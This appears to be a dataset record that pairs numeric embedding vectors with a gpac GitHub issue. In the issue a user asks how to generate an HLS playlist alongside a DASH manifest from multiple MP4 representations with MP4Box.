0.006954492535442114, -0.003281979588791728, 0.0034903890918940306, 0.017679130658507347, 0.009853449650108814, -0.0009261078084819019, 0.04298867657780647, 0.0013818861916661263, -0.03361588343977928, -0.013608574867248535, -0.01960175484418869, -0.0028632832691073418, -0.01895587332546711, 0.0025065462104976177, -0.002480260329321027, 0.007735558319836855, -0.014945399016141891, -0.0008195561240427196, 0.02563999593257904, -0.013082857243716717, -0.026330940425395966, -0.0019977267365902662, 0.009312710724771023, -0.04163683205842972, 0.012159096077084541, 0.005152032244950533, -0.01188872754573822, -0.017949499189853668, -0.0048591322265565395, -0.014967930503189564, -0.01435208972543478, 0.005061909090727568, 0.004637579899281263, 0.000666534760966897, -0.01664271578192711, -0.010093777440488338, 0.004551211837679148, -0.003548593493178487, 0.009027321822941303, -0.013548492453992367, -0.008614257909357548, -0.009402833878993988, 0.0260155089199543, -0.012714854441583157, -0.004322149325162172, 0.003178713610395789, 0.003146795090287924, -0.011445621959865093, 0.0030285087414085865, -0.015576260164380074, -0.008028457872569561, 0.005272196140140295, -0.023627249523997307, -0.027817970141768456, 0.007029594853520393, 0.003221897641196847, -0.005159542430192232, 0.007975886575877666, 0.012977713719010353, 0.0076792314648628235, -0.017528925091028214, 0.007634169887751341, -0.025760160759091377, -0.012654772959649563, -0.004303373862057924, 0.008418991230428219, 0.001145313261076808, -0.003999208565801382, -0.001114333514124155, -0.03448707237839699, 0.016747860237956047, -0.0022080137860029936, 0.020773354917764664, -0.003154305275529623, 0.0016513164155185223, 0.00039170653326436877, 0.013856412842869759, -0.01634230650961399, 0.004660110455006361, -0.012068972922861576, -0.004551211837679148, 0.02033775858581066, 0.0028219767846167088, -0.0010167001746594906, -0.0003989820834249258, 0.006962002720683813, 0.0008068825700320303, -0.007048370316624641, 0.0008143928134813905, 0.012324322015047073, -0.001992094097658992, 0.007960866205394268, -0.007014574483036995, 0.01086733303964138, 0.025489792227745056, 0.0027618948370218277, -0.004265822470188141, -0.005591381806880236, -0.0148627869784832, -0.022440629079937935, -0.026135673746466637, 0.012744896113872528, -0.011175253428518772, -0.013270613737404346, 0.009928551502525806, 0.02778792753815651, 0.0012448240304365754, 0.017258556559681892, 0.015861649066209793, 0.00043348228791728616, 0.011595827527344227, -0.0113855404779315, 0.008982259780168533, 0.0011631500674411654, -0.01352596189826727, 0.001265477272681892, -0.0038245953619480133, 0.000008925757356337272, -0.020968619734048843, -0.020833436399698257, 0.002803201088681817, 0.026150694116950035, -0.007239881902933121, 0.00042292100260965526, 0.010228961706161499, 0.020097430795431137, 0.01847521774470806, -0.00503562344238162, -0.003280102042481303, 0.0024145457427948713, -0.005880526266992092, -0.0025328320916742086, -0.007277433294802904, -0.001730174059048295, 0.017694151028990746, -0.006188446655869484, 0.0035241851583123207, 0.016116999089717865, 0.007713027764111757, 0.0021047478076070547, -0.013090367428958416, -0.006139629986137152, -0.0005623300094157457, 0.013758779503405094, 0.0009453528327867389, -0.023356880992650986, -0.011723501607775688, -0.009260139428079128, 0.014524824917316437, 0.009725774638354778, 0.019992288202047348, 0.031062398105859756, 0.0019939716439694166, -0.005268441047519445, 0.015275849960744381, 0.0015846629394218326, 0.008621768094599247, 0.03565867245197296, -0.005024357698857784, 0.0006632490549236536, -0.0015076828422024846, -0.0026004244573414326, 0.018084684386849403, 0.01757398620247841, -0.001102129346691072, 0.012384403496980667, -0.01532842218875885, 0.0018184195505455136, -0.01653757318854332, -0.010424228385090828, 0.014832745306193829, -0.00641375407576561, 0.0002776445762719959, -0.0017630313523113728, 0.004562477581202984, 0.0306718647480011, -0.00018458788690622896, -0.026541227474808693, -0.014765153639018536, 0.029950881376862526, 0.011423091404139996, 0.002947773551568389, -0.00420574052259326, -0.029274957254529, 0.00019280222477391362, 0.00011875584459630772, -0.007585353218019009, 0.006481346674263477, 0.005846730433404446, 0.019181180745363235, -0.016327286139130592, 0.0014457233482971787, -0.006312366109341383, 0.004753988701850176, -0.00030979784787632525, 0.01533593237400055, 0.03788170590996742, 0.03797182813286781, -0.00013541920634452254, 0.00015654179151169956, 0.000025640465537435375, -0.0039541469886898994, 0.009680713526904583, -0.0029346304945647717, -0.013713718391954899, -0.006781756412237883, -0.01268481370061636, -0.016672756522893906, 0.01784435659646988, -0.01152072474360466, -0.007863232865929604, 0.009327732026576996, 0.010807250626385212, -0.0005360441864468157, -0.011137702502310276, -0.000017866183043224737, -0.006500122137367725, 0.01820484735071659, -0.009350262582302094, 0.0028388749342411757, -0.028689159080386162, -0.0027468742337077856, 0.004814070649445057, -0.010326595045626163, 0.0009021689184010029, -0.019091058522462845, 0.0017236025305464864, 0.0014072332996875048, -0.032744694501161575, -0.0181297454982996, 0.013758779503405094, 0.007127228192985058, -0.009590590372681618, -0.0030810805037617683, -0.0017386231338605285, -0.007356290705502033, -0.006034486461430788, -0.011633378453552723, 0.008764462545514107, -0.000009475824299443047, 0.006789266597479582, -0.0056890151463449, 0.004506150726228952, 0.02583526261150837, -0.0204278826713562, -0.01301526464521885, 0.0125346090644598, 0.0034227969590574503, 0.014081720262765884, -0.007870743051171303, -0.0014250701060518622, -0.02256079390645027, 0.008028457872569561, 0.014517314732074738, -0.02008241042494774, 0.013120408169925213, -0.009252629242837429, -0.021419236436486244, -0.0035335731226950884, 0.00304165156558156, -0.0031580606009811163, 0.019721919670701027, -0.001761153806000948, 0.01635732688009739, 0.004397252108901739, -0.004701416939496994, -0.008696870878338814, -0.0034641032107174397, -0.028929486870765686, -0.00887711625546217, 0.008306337520480156, 0.015253319405019283, -0.03956400230526924, -0.0001168196031358093, 0.006135874893516302, 0.017498884350061417, -0.029244916513562202, -0.009598100557923317, 0.011302927508950233, -0.01700320839881897, 0.015651362016797066, 0.0157865472137928, 0.028088338673114777, -0.00427333265542984, 0.006195956841111183, 0.02173466607928276, -0.014179353602230549, -0.00033584903576411307, -0.008636788465082645, -0.004630069714039564, -0.0033721027430146933, -0.008644298650324345, 0.005933098029345274, 0.01942150853574276, -0.004348435439169407, -0.025399668142199516, 0.004066800698637962, -0.022260382771492004, -0.004949255380779505, -0.02675151452422142, -0.012474526651203632, -0.00040273720514960587, 0.027757886797189713, 0.0027112006209790707, -0.019556693732738495, -0.01969187706708908, 0.00471643777564168, -0.0013152327155694366, 0.017423782497644424, -0.0045850081369280815, 0.005474973004311323, 0.0026529962196946144, -0.025760160759091377, 0.003800187027081847, 0.05082937702536583, 0.01838509365916252, 0.025880323722958565, -0.004663866013288498, -0.0032162650022655725, 0.005936853121966124, -0.02229042537510395, -0.00794584583491087, -0.03208379074931145, -0.008118581026792526, 0.01152823492884636, 0.004232026170939207, -0.012346852570772171, -0.0007881069323047996, -0.008479073643684387, 0.0038170849438756704, 0.012579670175909996, -0.001530213630758226, 0.0005487176822498441, -0.010762189514935017, 0.00021509827638510615, 0.019751960411667824, 0.031633175909519196, -0.013037795200943947, 0.034426990896463394, 0.011363009922206402, 0.0018278072820976377, -0.009966103360056877, 0.005497503560036421, -0.0038302280008792877, 0.006473836489021778, -0.0012204158119857311, 0.0006876573315821588, 0.007607884239405394, -0.008644298650324345, 0.030401496216654778, 0.00037457377766259015, 0.020232615992426872, -0.016282223165035248, -0.008471563458442688, -0.0017527048476040363, 0.014667520299553871, -0.024032803252339363, 0.012189136818051338, 0.0012138442834839225, 0.014059189707040787, -0.016883043572306633, 0.00239201495423913, 0.020983640104532242, 0.01337575726211071, 0.020878497511148453, 0.0025929140392690897, 0.00015560300380457193, -0.010904883965849876, 0.0008195561240427196, 0.003289490006864071, -0.00764168007299304, -0.006804287433624268, 0.00608330313116312, -0.023206675425171852, -0.0016607042634859681, -0.03169325739145279, -0.008937198668718338, -0.010784720070660114, -0.023717371746897697, -0.021779727190732956, 0.009395323693752289, 0.01745382323861122, 0.006808042526245117, 0.02454349957406521, 0.0022925040684640408, -0.0035279402509331703, -0.02340194210410118, -0.007142248563468456, -0.0010767822386696935, -0.023537125438451767, 0.004224515985697508, -0.008208704181015491, -0.018355052918195724, -0.003419041633605957, -0.011423091404139996, 0.0042695775628089905, 0.004220760893076658, -0.014780174009501934, -0.015561239793896675, 0.003931616432964802, -0.028403768315911293, 0.00374949281103909, -0.004449823871254921, -0.003987943287938833, 0.011152722872793674, 0.028824342414736748, -0.01791945844888687, 0.0010138838551938534, 0.019556693732738495, 0.0019545427057892084, 0.017604028806090355, 0.01468254067003727, 0.004171944223344326, 0.02582024224102497, 0.005418646149337292, 0.005456197075545788, -0.019646815955638885, 0.006657837424427271, 0.00010866394586628303, 0.033405594527721405, -0.01931636594235897, -0.027923112735152245, 0.0024577295407652855, 0.001657887944020331, 0.011257866397500038, 0.010604474693536758, -0.01727357693016529, -0.008569195866584778, 0.00803596805781126, -0.012579670175909996, -0.007626659702509642, -0.0014663764741271734, 0.010146348737180233, 0.01840011402964592, 0.003685655537992716, -0.010889863595366478, 0.03668006509542465, -0.00822372455149889, 0.007825681008398533, -0.007878253236413002, 0.004825336392968893, -0.014772663824260235, 0.031813424080610275, 0.0018390726763755083, -0.005279706325381994, -0.016612675040960312, 0.011182763613760471, 0.004949255380779505, -0.006102079059928656, 0.013601064682006836, -0.012804977595806122, 0.03169325739145279, 0.006965757813304663, 0.010379166342318058, 0.024318192154169083, 0.03307514637708664, -0.013037795200943947, -0.009462916292250156, -0.019736940041184425, 0.020112451165914536, -0.008366419933736324, -0.0074051073752343655, 0.004648845177143812, 0.004926724825054407, 0.026135673746466637, 0.012812487781047821, 0.0020709517411887646, 0.000028764847229467705, 0.0019808285869657993, 0.02544472925364971, -0.01221917849034071, 0.009455406107008457, -0.004307128954678774, -0.005200848914682865, -0.011100150644779205, 0.017408762127161026, 0.004648845177143812, 0.008501604199409485, -0.017498884350061417, -0.01170848123729229, 0.02323671616613865, 0.001893521985039115, 0.006105834152549505, 0.005658973939716816, 0.0009716387139633298, -0.06566963344812393, -0.01067957654595375, -0.02331181801855564, 0.019376447424292564, -0.012962693348526955, 0.008163643069565296, -0.003246305976063013, 0.010521861724555492, 0.006308610551059246, -0.008193683810532093, 0.015906712040305138, -0.001610010047443211, -0.013863923028111458, 0.013616085052490234, 0.009477936662733555, -0.02805829793214798, -0.042327772825956345, 0.01300024427473545, -0.011085130274295807, -0.0012091504177078605, -0.012955183163285255, 0.007063391152769327, -0.017904438078403473, 0.005527544766664505, 0.014802704565227032, -0.010191410779953003, -0.011603337712585926, 0.02796817384660244, -0.013556002639234066, 0.007705517578870058, -0.012061462737619877, -0.027938133105635643, 0.017634069547057152 ]
null
null
null
null
null
null
null
null
null
[ "gpac", "gpac" ]
I'd like to generate a HLS .m3u8 at the same time as the DASH .mpd, but - as I'm new to streaming tech - have been overwhelmed by all the options available. Having read about the gpac 0.9.0 rearchitecture I gather this is possible, and have been exploring 1.0.1 on Debian testing - but can't see how to manage it. I've successfully used FFMPEG to create multiple scaled represenatations of a video (and a single separate audio file), and then MP4Box to create an .mpd file and adjust the video container information as needed - resulting in a working stream with single files for each representation (serving byte-ranges via Apache). I'm currently using gpac 0.5.2 on Debian 10 this with command: ```MP4Box -dash 5000 -frag 5000 -rap -profile onDemand -out film.mpd film_360.mp4 film_540.mp4 film_720.mp4 film_1080.mp4 film_audio.mp4``` It seems that, to get the .m3u8, I need to specify the *dasher* filter with the *dual* option, but haven't wrapped my head around how to do this. Any suggestions or examples?
How to generate both DASH & HLS for multiple representation files? [Help wanted]
https://api.github.com/repos/gpac/gpac/issues/1743/comments
2
2021-04-14T13:22:40
2021-04-14T14:05:11Z
https://github.com/gpac/gpac/issues/1743
857,894,718
1,743
false
This is a GitHub Issue repo:gpac owner:gpac Title : How to generate both DASH & HLS for multiple representation files? [Help wanted] Issue date: --- start body --- I'd like to generate a HLS .m3u8 at the same time as the DASH .mpd, but - as I'm new to streaming tech - have been overwhelmed by all the options available. Having read about the gpac 0.9.0 rearchitecture I gather this is possible, and have been exploring 1.0.1 on Debian testing - but can't see how to manage it. I've successfully used FFMPEG to create multiple scaled represenatations of a video (and a single separate audio file), and then MP4Box to create an .mpd file and adjust the video container information as needed - resulting in a working stream with single files for each representation (serving byte-ranges via Apache). I'm currently using gpac 0.5.2 on Debian 10 this with command: ```MP4Box -dash 5000 -frag 5000 -rap -profile onDemand -out film.mpd film_360.mp4 film_540.mp4 film_720.mp4 film_1080.mp4 film_audio.mp4``` It seems that, to get the .m3u8, I need to specify the *dasher* filter with the *dual* option, but haven't wrapped my head around how to do this. Any suggestions or examples? --- end body ---
1,212
[ -0.03168080002069473, 0.029445605352520943, -0.03337272256612778, 0.008257808163762093, -0.012363429181277752, 0.0031878710724413395, -0.003948458470404148, 0.053365308791399, -0.018409324809908867, 0.02180868573486805, 0.011765824630856514, -0.004734269808977842, 0.023360904306173325, -0.0039814431220293045, 0.01500996295362711, 0.00822676345705986, -0.023997314274311066, 0.02939903922379017, 0.004319050814956427, 0.02067556418478489, 0.026775788515806198, -0.014109675772488117, -0.03411778807640076, 0.03149453550577164, 0.00940645020455122, 0.02328329347074032, -0.02342299371957779, -0.0007528265123255551, -0.049174316227436066, 0.01957348920404911, 0.018223058432340622, 0.032844964414834976, -0.02531670220196247, -0.004707105923444033, -0.0009526747744530439, -0.00023174153466243297, 0.0374084934592247, 0.05696645751595497, -0.004365617409348488, -0.00946077797561884, 0.0027474286034703255, 0.017012326046824455, -0.020908398553729057, -0.0017297547310590744, -0.0010205843718722463, 0.015297124162316322, -0.012813572771847248, 0.0187973789870739, 0.011222547851502895, -0.03976786509156227, 0.01345774345099926, -0.01906125620007515, -0.011649408377707005, -0.048056717962026596, -0.037067003548145294, -0.07059494405984879, 0.03815355896949768, -0.006371861323714256, 0.005110682919621468, 0.03709804639220238, 0.029383515939116478, -0.013760427013039589, 0.0034051816910505295, 0.030889170244336128, 0.01769530400633812, 0.0016599048394709826, -0.020271988585591316, 0.03914697840809822, -0.013527593575417995, 0.020287510007619858, 0.01588696800172329, -0.0019460952607914805, 0.005685004405677319, 0.02716384269297123, 0.0047808364033699036, -0.04951580613851547, 0.03886757791042328, 0.015529956668615341, 0.011222547851502895, 0.04001621901988983, -0.04908118396997452, -0.016174128279089928, -0.05606617033481598, 0.0012922227615490556, -0.011564035899937153, 0.015025485306978226, -0.05370679870247841, -0.06059865280985832, 0.0035487620625644922, -0.008203480392694473, 0.003731147851794958, -0.0031975724268704653, 0.06090909615159035, -0.008832129649817944, 0.011447619646787643, 0.03216198831796646, -0.0015182647621259093, 0.0016569944564253092, -0.03613567352294922, -0.05032295733690262, -0.04575943201780319, 0.019247522577643394, -0.009553911164402962, -0.0049088941887021065, 0.031587667763233185, 0.007931842468678951, 0.03787415847182274, -0.02531670220196247, -0.03362107649445534, 0.0673663318157196, 0.035825226455926895, 0.017509037628769875, 0.010260171256959438, 0.012495367787778378, -0.037812069058418274, 0.00402412936091423, -0.04327588155865669, -0.056407660245895386, 0.006783199496567249, -0.01146314200013876, 0.023640304803848267, 0.011067325249314308, -0.031711846590042114, 0.010167038068175316, -0.03902279958128929, 0.03177393600344658, -0.02618594467639923, 0.011168220080435276, 0.014645191840827465, -0.0015551300020888448, -0.036818649619817734, -0.023640304803848267, -0.013737143017351627, -0.03092021308839321, 0.013302521780133247, 0.008785562589764595, -0.022383006289601326, 0.01955796591937542, -0.02256927266716957, 0.017260681837797165, -0.013116255402565002, -0.0491122268140316, 0.04209619387984276, -0.031230658292770386, 0.000004229192200000398, -0.01769530400633812, 0.038712356239557266, 0.02679130993783474, -0.03802938014268875, 0.013162822462618351, -0.011804630048573017, 0.01034554373472929, 0.00539396284148097, -0.012836855836212635, 0.004532481078058481, 0.03324854373931885, -0.02967843785881996, -0.015529956668615341, 0.02368687093257904, 0.03001992590725422, 0.004551883786916733, -0.012627306394279003, -0.0015386376762762666, 0.003546821651980281, 0.00822676345705986, -0.010741359554231167, 0.0011282695923000574, 0.01721411570906639, -0.0266826543956995, 0.009670328348875046, -0.004645016975700855, -0.011106130667030811, 0.01034554373472929, 0.014187286607921124, -0.05771152302622795, -0.03480076417326927, 0.03967473283410072, 0.031727369874715805, 0.010741359554231167, -0.0065814112313091755, -0.0602882094681263, -0.03256556764245033, 0.026123855262994766, -0.008195719681680202, 0.01340341567993164, -0.01002733875066042, 0.041568439453840256, -0.03598044812679291, 0.0008542058640159667, -0.026496388018131256, 0.010555093176662922, 0.056656014174222946, 0.009142572991549969, 0.021886296570301056, 0.04619405418634415, -0.02331433817744255, -0.02930590510368347, -0.0351112075150013, 0.002308926545083523, 0.018781857565045357, -0.028498752042651176, -0.04315170273184776, 0.0011020759120583534, -0.008948545902967453, -0.03728431463241577, 0.027582941576838493, -0.0052659050561487675, 0.030314847826957703, 0.04908118396997452, -0.03489389643073082, -0.014427880756556988, -0.04023353010416031, 0.010004054754972458, 0.0099730109795928, -0.01632934994995594, 0.006732752546668053, 0.0071052853018045425, 0.01532816793769598, -0.010058382526040077, -0.019045734778046608, 0.011804630048573017, -0.0073458789847791195, -0.009010634385049343, -0.014171765185892582, -0.02865397371351719, -0.017866047099232674, 0.014373552985489368, 0.011424335651099682, -0.011952091008424759, 0.01708993688225746, 0.008731234818696976, 0.010950908996164799, -0.00012611784040927887, 0.012673872523009777, -0.0028289202600717545, 0.011983134783804417, -0.006426189094781876, -0.013108494691550732, 0.004590689204633236, 0.019635576754808426, -0.031184092164039612, -0.002367134904488921, 0.0031936918385326862, 0.019651100039482117, -0.005425007548183203, 0.014815935865044594, 0.002662056591361761, 0.020116765052080154, -0.00971689447760582, -0.02379552647471428, 0.014730563387274742, -0.004128904081881046, 0.008187958039343357, -0.024773424491286278, -0.03675656020641327, 0.019589010626077652, 0.006942301988601685, 0.00023489448358304799, 0.00535903824493289, -0.06829766184091568, 0.004299648106098175, -0.0058945538476109505, -0.017229637131094933, -0.012572978623211384, 0.010415392927825451, -0.042561862617731094, 0.010236888192594051, -0.002122660167515278, -0.003267422318458557, -0.01632934994995594, -0.01969766616821289, -0.04190992936491966, -0.02179316245019436, 0.03473867475986481, 0.010997476056218147, -0.029352473095059395, 0.011432097293436527, -0.02093944139778614, 0.04377259314060211, -0.008071541786193848, -0.002619370585307479, 0.034459274262189865, 0.018254103139042854, 0.02454059198498726, -0.04957789182662964, 0.0005568587803281844, -0.002580564934760332, -0.004105620551854372, -0.052775464951992035, 0.024230146780610085, 0.027970997616648674, 0.026341166347265244, 0.002186689293012023, 0.00011477935913717374, 0.0331554114818573, 0.012138357385993004, 0.014288181439042091, 0.017664259299635887, 0.05035400390625, 0.008242285810410976, -0.03151005879044533, 0.029616350308060646, 0.04650449752807617, -0.020023632794618607, -0.03467658534646034, -0.0038068185094743967, -0.039209067821502686, 0.033341675996780396, -0.007582592777907848, -0.010919864289462566, 0.009243467822670937, -0.0047808364033699036, -0.020349599421024323, 0.020116765052080154, -0.030221715569496155, 0.032844964414834976, 0.04377259314060211, -0.016981281340122223, -0.02118779718875885, 0.006371861323714256, 0.007706770207732916, -0.021280931308865547, -0.06953943520784378, 0.007900797761976719, -0.006042014807462692, -0.019852887839078903, -0.04898804798722267, -0.038557134568691254, -0.03911593183875084, 0.01576278917491436, 0.003263541730120778, -0.015351451933383942, 0.030221715569496155, -0.015025485306978226, 0.00810258649289608, -0.045293767005205154, -0.031075436621904373, -0.018378280103206635, 0.012976556085050106, -0.012844616547226906, 0.00039411825127899647, 0.0178194809705019, 0.032472435384988785, -0.013574160635471344, 0.01656218245625496, 0.005735451355576515, -0.02454059198498726, 0.02429223619401455, 0.04026457667350769, -0.00232056831009686, 0.001042897580191493, 0.010167038068175316, 0.038712356239557266, 0.01483145821839571, 0.009072723798453808, -0.0007179015665315092, 0.015731746330857277, -0.015553239732980728, 0.0031180211808532476, 0.005805301014333963, -0.0012408054899424314, -0.04507645592093468, -0.012091790325939655, 0.03393151983618736, -0.01892155595123768, 0.013900126330554485, -0.05324112996459007, -0.03275183215737343, -0.020644519478082657, 0.007268268149346113, -0.018285145983099937, 0.0071285683661699295, -0.03417987376451492, 0.017043370753526688, -0.0368807353079319, -0.0013048346154391766, 0.027365630492568016, -0.024012837558984756, -0.034086741507053375, 0.011626124382019043, -0.02292628400027752, 0.04606987535953522, -0.009732416830956936, -0.030252760276198387, 0.010966431349515915, 0.01955796591937542, 0.013954454101622105, 0.013783710077404976, -0.01296103373169899, -0.03827773407101631, -0.023516125977039337, 0.0077339340932667255, -0.053551577031612396, -0.018673202022910118, -0.036973871290683746, 0.014264898374676704, -0.004912775009870529, -0.02379552647471428, 0.011571796610951424, -0.015180707909166813, 0.032348256558179855, -0.03300018981099129, -0.017260681837797165, 0.05662497133016586, 0.013155060820281506, -0.005522021092474461, -0.007656323257833719, -0.015498912893235683, 0.020271988585591316, -0.0009162946371361613, -0.01376818772405386, -0.017353814095258713, -0.009895400144159794, 0.009786744602024555, 0.01881290040910244, 0.029880227521061897, -0.017415903508663177, 0.04395885765552521, -0.05022982507944107, -0.007947363890707493, -0.008467357605695724, -0.0011709555983543396, -0.009647044353187084, -0.020520342513918877, 0.0034148830454796553, 0.044051989912986755, 0.0025204166304320097, 0.012285818345844746, 0.017400382086634636, -0.01508757472038269, 0.03924011066555977, -0.04364841431379318, -0.016515616327524185, -0.05035400390625, 0.00897182896733284, -0.011044042184948921, -0.04563525691628456, 0.012611784040927887, -0.02131197415292263, 0.005502618383616209, -0.0307649914175272, 0.00030753351165913045, -0.0023011656012386084, 0.011486425064504147, -0.002559222048148513, -0.03526642918586731, -0.04824298620223999, -0.03182050213217735, -0.020256465300917625, -0.02170003019273281, 0.029073072597384453, 0.046783898025751114, -0.012658351100981236, -0.000311656593112275, -0.02494416944682598, -0.0063369362615048885, -0.04004726558923721, 0.009693611413240433, 0.01732277125120163, -0.006961704697459936, -0.009235706180334091, 0.0374084934592247, 0.024245670065283775, 0.000015484300092794, 0.027877863496541977, 0.0039212945848703384, -0.041816797107458115, -0.014784891158342361, 0.019216477870941162, -0.015739506110548973, 0.01116045843809843, 0.010671509429812431, 0.011261353269219398, 0.013224910944700241, -0.018843945115804672, 0.03861922398209572, -0.009910921566188335, -0.03979891166090965, 0.021498240530490875, -0.048677604645490646, -0.00258832611143589, -0.019728710874915123, 0.0478704534471035, 0.012076267972588539, -0.02544087916612625, -0.03237929940223694, 0.007931842468678951, 0.0060885814018547535, -0.02156032994389534, 0.005673362407833338, 0.004307409282773733, -0.011990896426141262, 0.009817788377404213, -0.0011990895727649331, 0.013318044133484364, 0.008319896645843983, -0.002306986367329955, 0.005099041387438774, 0.008490640670061111, -0.0073458789847791195, -0.020132288336753845, 0.007714531384408474, -0.005681123584508896, -0.01574726775288582, 0.011944329366087914, 0.017726346850395203, -0.03377629816532135, 0.02879367396235466, -0.029864704236388206, -0.01594129577279091, -0.03065633587539196, 0.031246179714798927, 0.016344871371984482, -0.008933023549616337, 0.008948545902967453, -0.027256974950432777, -0.017493514344096184, 0.005382321309298277, 0.03964368626475334, 0.0006461113807745278, 0.0008799144998192787, -0.0019034092547371984, -0.014808175154030323, 0.015623089857399464, -0.028250396251678467, -0.0004273454542271793, -0.00554918497800827, -0.015514434315264225, 0.01892155595123768, -0.006313653197139502, -0.02691548690199852, -0.007093643303960562, 0.016655316576361656, 0.05156473442912102, -0.003969801589846611, -0.012821333482861519, -0.013985498808324337, 0.03467658534646034, 0.03200676664710045, 0.017012326046824455, -0.03126170113682747, 0.02631012164056301, -0.02703966572880745, 0.002908471506088972, -0.023003894835710526, 0.01632934994995594, 0.006236042361706495, -0.009235706180334091, 0.0007048047264106572, -0.002246837830170989, -0.004548003431409597, -0.04324483871459961, 0.021963907405734062, 0.024152535945177078, -0.007749456446617842, 0.030873646959662437, 0.04877074062824249, -0.01383027620613575, 0.01296879444271326, -0.029352473095059395, 0.005847987253218889, 0.01708993688225746, 0.02854531817138195, -0.022507183253765106, -0.007753336802124977, 0.0037777144461870193, 0.01402430422604084, 0.031354837119579315, -0.014792652800679207, 0.014878024347126484, -0.006034253630787134, 0.0073148347437381744, 0.0099730109795928, -0.0014066989533603191, -0.017493514344096184, 0.0031684681307524443, 0.007730053272098303, 0.014528775587677956, 0.0006723051192238927, -0.007970647886395454, 0.011928807012736797, -0.004012487828731537, -0.0000953766138991341, 0.0006640589563176036, -0.009895400144159794, 0.005087399855256081, 0.010555093176662922, -0.0012320743408054113, -0.01109836995601654, -0.0051029217429459095, 0.009507345035672188, 0.0014658774016425014, 0.0065814112313091755, -0.036694470793008804, 0.017509037628769875, 0.009453017264604568, -0.004373378586024046, 0.029243817552924156, 0.024633724242448807, -0.01767978072166443, -0.03442823141813278, 0.04532480984926224, -0.039457421749830246, -0.006887974217534065, -0.0326276570558548, 0.0020877353381365538, 0.006181714590638876, 0.004311290103942156, -0.02393522672355175, -0.0005524931475520134, -0.005778137594461441, 0.013799232430756092, 0.08797980844974518, 0.010120471939444542, -0.0011030460009351373, 0.04262394830584526, 0.010213605128228664, 0.012184923514723778, -0.011230308562517166, 0.010562853887677193, 0.021886296570301056, -0.029212772846221924, 0.016888149082660675, -0.02916620671749115, 0.0010467780521139503, 0.047156430780887604, 0.024851035326719284, -0.03858817741274834, -0.012316862121224403, -0.023345382884144783, -0.02166898548603058, -0.005459932144731283, -0.004311290103942156, -0.01029121596366167, -0.006488278042525053, -0.013853559270501137, 0.023873137310147285, -0.004346214700490236, -0.01445892546325922, -0.008808845654129982, -0.05010564625263214, -0.00688409386202693, -0.0009861445287242532, 0.036973871290683746, -0.02292628400027752, 0.01769530400633812, 0.016608748584985733, 0.01308521069586277, 0.017757391557097435, 0.013985498808324337, -0.003108319593593478, -0.035452693700790405, 0.027955474331974983, 0.0224295724183321, 0.027241453528404236, -0.015390257351100445, 0.0008857353241182864, 0.004842924885451794, -0.019914977252483368, -0.00859153550118208, -0.014039825648069382, -0.02143615297973156, 0.016422482207417488, -0.0037078645545989275, 0.009080484509468079, 0.018378280103206635, 0.00762915937229991, 0.011820152401924133, -0.005910076200962067, 0.028390096500515938, 0.022522706538438797, -0.015925772488117218, 0.026372211053967476, 0.003541000885888934, 0.02044273167848587, -0.017881570383906364, 0.013038644567131996, 0.012604023329913616, -0.008754518814384937, 0.001489160698838532, -0.017353814095258713, 0.004128904081881046, -0.00810258649289608, 0.0187973789870739, -0.03684969246387482, 0.004606211557984352, 0.0023050459567457438, -0.008661385625600815, -0.004350095521658659, 0.0007334237452596426, 0.03126170113682747, 0.02540983445942402, -0.0009284213301725686, 0.04253081604838371, -0.017152026295661926, -0.0122780567035079, -0.010042861104011536, 0.01646905019879341, -0.02120331861078739, -0.019542444497346878, -0.017540080472826958, 0.004408303648233414, 0.01831619068980217, -0.02044273167848587, 0.011602841317653656, 0.02843666262924671, -0.012751484289765358, -0.012084029614925385, -0.04901909455657005, 0.006690066307783127, 0.018766334280371666, 0.04808776080608368, 0.0187973789870739, 0.02592206746339798, 0.016872627660632133, 0.010749120265245438, -0.0013775948900729418, -0.025766845792531967, -0.03613567352294922, 0.02505282312631607, -0.002324448898434639, -0.006759916432201862, -0.003021007403731346, -0.031323790550231934, 0.0010458079632371664, 0.013038644567131996, 0.035825226455926895, 0.031479012221097946, -0.011874480172991753, 0.000029210224965936504, -0.005642318166792393, -0.025999678298830986, 0.0058130621910095215, 0.016996804624795914, -0.04728060960769653, -0.009887638501822948, -0.0072333430871367455, 0.038184601813554764, 0.0016055770684033632, 0.020147809758782387, 0.01340341567993164, -0.011439858004450798, 0.019402744248509407, -0.02093944139778614, -0.012836855836212635, -0.005293068941682577, -0.008094824850559235, 0.0047420309856534, -0.010958670638501644, -0.014722802676260471, 0.016158604994416237, 0.012557456269860268, 0.03042350336909294, -0.03889862075448036, -0.023655826225876808, 0.0156929399818182, 0.030314847826957703, -0.0028813076205551624, -0.02790890820324421, -0.011424335651099682, 0.02142062969505787, 0.005192174576222897, 0.01906125620007515, -0.02131197415292263, -0.021032575517892838, -0.02354717068374157, 0.016174128279089928, -0.004970983136445284, 0.03203781321644783, -0.01833171397447586, -0.016360394656658173, 0.01895260065793991, -0.005933359265327454, -0.030578725039958954, -0.0037001033779233694, 0.0014435641933232546, -0.021731074899435043, 0.005083519034087658, -0.0076912478543818, 0.024012837558984756, -0.0025960872881114483, -0.015141901560127735, -0.022103607654571533, 0.016003383323550224, 0.0016734867822378874, -0.05553841590881348, 0.04448661208152771, 0.006461114156991243, 0.007861992344260216, -0.020644519478082657, 0.02542535588145256, -0.006527083460241556, -0.007543787360191345, -0.0011942388955503702, 0.02306598238646984, 0.019961543381214142, 0.02964739315211773, 0.011059564538300037, -0.02430775947868824, 0.0017035609344020486, 0.007050957530736923, -0.01659322716295719, -0.009833310730755329, -0.007947363890707493, -0.023624781519174576, -0.01046972069889307, -0.019356178119778633, 0.000705774815287441, -0.00804825872182846, 0.020039154216647148, -0.012549695558845997, 0.007741695269942284, 0.006018731277436018, -0.015824878588318825, 0.00965480599552393, -0.0153824957087636, 0.0030423502903431654, 0.006142909172922373, -0.034955985844135284, 0.052309799939394, -0.022833149880170822, 0.0020372881554067135, 0.03601149469614029, -0.007182896137237549, 0.008513924665749073, -0.05134742334485054, -0.0034963747020810843, 0.00535903824493289, 0.024525068700313568, 0.0011117772664874792, 0.010298976674675941, 0.020411686971783638, -0.023842092603445053, 0.006092461757361889, -0.03827773407101631, 0.023764481768012047, -0.009546150453388691, 0.0024913123343139887, -0.02418358065187931, 0.02703966572880745, -0.02592206746339798, 0.01657770574092865, 0.006915138103067875, -0.03622880578041077, -0.005754854064434767, -0.035080160945653915, 0.021855251863598824, -0.04147530719637871, -0.0007605875725857913, 0.021839728578925133, 0.03039245866239071, -0.0020159452687948942, 0.015700701624155045, 0.03039245866239071, -0.01783500239253044, 0.0023457917850464582, -0.012285818345844746, 0.01334132719784975, -0.00026994067593477666, -0.019790800288319588, 0.04877074062824249, 0.0059255980886518955, 